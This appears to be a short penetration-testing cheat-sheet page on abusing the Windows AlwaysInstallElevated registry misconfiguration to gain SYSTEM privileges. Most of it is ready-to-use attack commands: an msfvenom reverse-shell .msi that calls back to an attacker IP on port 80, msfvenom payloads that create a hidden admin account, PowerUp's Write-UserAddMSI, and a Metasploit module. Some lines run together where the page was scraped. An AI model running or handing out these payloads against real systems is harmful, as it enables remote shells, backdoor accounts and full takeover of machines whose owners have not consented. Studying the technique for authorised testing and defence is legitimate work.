AlwaysInstalledElevated
Windows systems are affected by a privilege escalation vulnerability when the registry keys HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated are both set to 1. This misconfiguration allows any local user to execute Windows Installer (.msi) packages with elevated privileges. Exploitation is achieved by generating a malicious .msi payload and executing it through msiexec, which results in code execution as SYSTEM.
There are various ways to exploit this misconfiguration:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f msi -o revshell.msiCreate an admin user:
# Create an admin user (No UAC format)
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi
# Create an admin user (Using the msiexec the uac wont be prompted)
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi
# PowerUp
Write-UserAddMSIIf you have a meterpreter session you can automate this technique using the module:
> use exploit/windows/local/always_install_elevatedLast updated
Was this helpful?